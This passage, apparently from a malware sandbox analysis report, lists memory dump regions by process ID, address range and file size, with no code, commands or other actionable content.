                                                                                                                                                                                                                                                                                                          • memory/1480-202-0x00000000772E0000-0x000000007746E000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            1.6MB

                                                                                                                                                                                                                                                                                                          • memory/1480-201-0x00000000008A0000-0x00000000008A1000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                          • memory/1488-125-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/1488-205-0x00000000772E0000-0x000000007746E000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            1.6MB

                                                                                                                                                                                                                                                                                                          • memory/1488-206-0x00000000003F0000-0x00000000003F1000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                          • memory/1488-231-0x0000000005890000-0x0000000005891000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                          • memory/1548-433-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/1736-298-0x00000000049D0000-0x00000000052F6000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            9.1MB

                                                                                                                                                                                                                                                                                                          • memory/1736-336-0x0000000000400000-0x00000000027DB000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            35.9MB

                                                                                                                                                                                                                                                                                                          • memory/1736-121-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/1924-196-0x00000000059E0000-0x00000000059E1000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                          • memory/1924-218-0x0000000005EF0000-0x0000000005EF1000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                          • memory/1924-174-0x0000000000FA0000-0x0000000000FA1000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                          • memory/1924-120-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/2476-342-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/2520-130-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/2520-368-0x0000000002CD0000-0x0000000002D7E000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            696KB

                                                                                                                                                                                                                                                                                                          • memory/2520-369-0x0000000000400000-0x0000000002CD0000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            40.8MB

                                                                                                                                                                                                                                                                                                          • memory/2520-377-0x0000000004BD0000-0x0000000004BD1000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                          • memory/2520-397-0x0000000004BD3000-0x0000000004BD4000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                          • memory/2520-394-0x0000000004BD4000-0x0000000004BD6000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                                                          • memory/2520-391-0x0000000004BD2000-0x0000000004BD3000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                          • memory/2916-641-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/3004-435-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/3016-286-0x0000000001310000-0x0000000001326000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            88KB

                                                                                                                                                                                                                                                                                                          • memory/3156-414-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/3156-153-0x0000000000420000-0x000000000056A000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            1.3MB

                                                                                                                                                                                                                                                                                                          • memory/3156-155-0x0000000000590000-0x00000000005A2000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            72KB

                                                                                                                                                                                                                                                                                                          • memory/3156-122-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/3184-434-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/3260-115-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/3260-220-0x0000000002510000-0x000000000265A000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            1.3MB

                                                                                                                                                                                                                                                                                                          • memory/3260-235-0x0000000000400000-0x00000000023BB000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            31.7MB

                                                                                                                                                                                                                                                                                                          • memory/3328-626-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/3336-426-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/3336-585-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/3472-409-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/3548-152-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/3628-129-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/3672-421-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/3840-118-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/3840-190-0x000000001B200000-0x000000001B202000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            8KB

                                                                                                                                                                                                                                                                                                          • memory/3840-175-0x00000000009A0000-0x00000000009BC000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            112KB

                                                                                                                                                                                                                                                                                                          • memory/3840-158-0x0000000000490000-0x0000000000491000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                          • memory/4060-114-0x0000000003610000-0x000000000374F000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            1.2MB

                                                                                                                                                                                                                                                                                                          • memory/4084-430-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/4264-321-0x00000000050A0000-0x00000000050A1000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                          • memory/4264-326-0x00000000050D0000-0x00000000050D1000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                          • memory/4264-291-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/4264-330-0x00000000050F0000-0x00000000050F1000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                          • memory/4264-334-0x0000000005110000-0x0000000005111000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                          • memory/4264-333-0x0000000005100000-0x0000000005101000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                          • memory/4264-303-0x00000000001E0000-0x00000000001E1000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                          • memory/4264-313-0x0000000005040000-0x0000000005041000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                          • memory/4264-305-0x0000000005000000-0x0000000005001000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                          • memory/4264-309-0x0000000005020000-0x0000000005021000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                          • memory/4264-327-0x00000000050E0000-0x00000000050E1000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                          • memory/4264-311-0x0000000005030000-0x0000000005031000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                          • memory/4264-323-0x00000000050C0000-0x00000000050C1000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                          • memory/4264-322-0x00000000050B0000-0x00000000050B1000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                          • memory/4264-319-0x0000000005090000-0x0000000005091000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                          • memory/4264-317-0x0000000005080000-0x0000000005081000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                          • memory/4264-316-0x0000000005070000-0x0000000005071000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                          • memory/4264-315-0x0000000005060000-0x0000000005061000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                          • memory/4264-314-0x0000000005050000-0x0000000005051000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                          • memory/4264-307-0x0000000005010000-0x0000000005011000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                          • memory/4284-403-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/4284-424-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/4304-429-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            80KB

                                                                                                                                                                                                                                                                                                          • memory/4304-419-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/4480-427-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            80KB

                                                                                                                                                                                                                                                                                                          • memory/4480-418-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/4520-420-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/4532-260-0x0000000004F30000-0x0000000004F31000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                          • memory/4532-240-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            120KB

                                                                                                                                                                                                                                                                                                          • memory/4532-293-0x0000000004E90000-0x000000000538E000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            5.0MB

                                                                                                                                                                                                                                                                                                          • memory/4532-242-0x000000000041905A-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/4552-245-0x0000000000418E52-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/4552-241-0x0000000000400000-0x000000000041E000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            120KB

                                                                                                                                                                                                                                                                                                          • memory/4552-294-0x00000000054A0000-0x0000000005AA6000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            6.0MB

                                                                                                                                                                                                                                                                                                          • memory/4596-371-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/4596-393-0x0000000004C60000-0x0000000004C61000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                          • memory/4620-509-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/4664-586-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/4700-276-0x0000000000418F7A-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/4700-299-0x0000000005540000-0x0000000005B46000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            6.0MB

                                                                                                                                                                                                                                                                                                          • memory/4828-252-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/4860-255-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/4860-268-0x0000000000030000-0x0000000000033000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            12KB

                                                                                                                                                                                                                                                                                                          • memory/4872-256-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/4916-262-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/4916-374-0x000002B6F5050000-0x000002B6F511F000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            828KB

                                                                                                                                                                                                                                                                                                          • memory/4916-372-0x000002B6F4FE0000-0x000002B6F504F000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            444KB

                                                                                                                                                                                                                                                                                                          • memory/4932-289-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            80KB

                                                                                                                                                                                                                                                                                                          • memory/4932-265-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/4944-428-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/4944-440-0x0000000000400000-0x000000000046D000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            436KB

                                                                                                                                                                                                                                                                                                          • memory/4952-335-0x00000000772E0000-0x000000007746E000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            1.6MB

                                                                                                                                                                                                                                                                                                          • memory/4952-332-0x00000000057D0000-0x00000000057D1000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            4KB

                                                                                                                                                                                                                                                                                                          • memory/4952-266-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/4984-425-0x0000000000400000-0x0000000000414000-memory.dmp
                                                                                                                                                                                                                                                                                                            Filesize

                                                                                                                                                                                                                                                                                                            80KB

                                                                                                                                                                                                                                                                                                          • memory/4984-415-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/5100-650-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/5164-437-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/5208-438-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/5264-442-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/5320-591-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/5688-485-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/5896-551-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/6040-582-0x0000000000000000-mapping.dmp
                                                                                                                                                                                                                                                                                                          • memory/6128-581-0x0000000000000000-mapping.dmp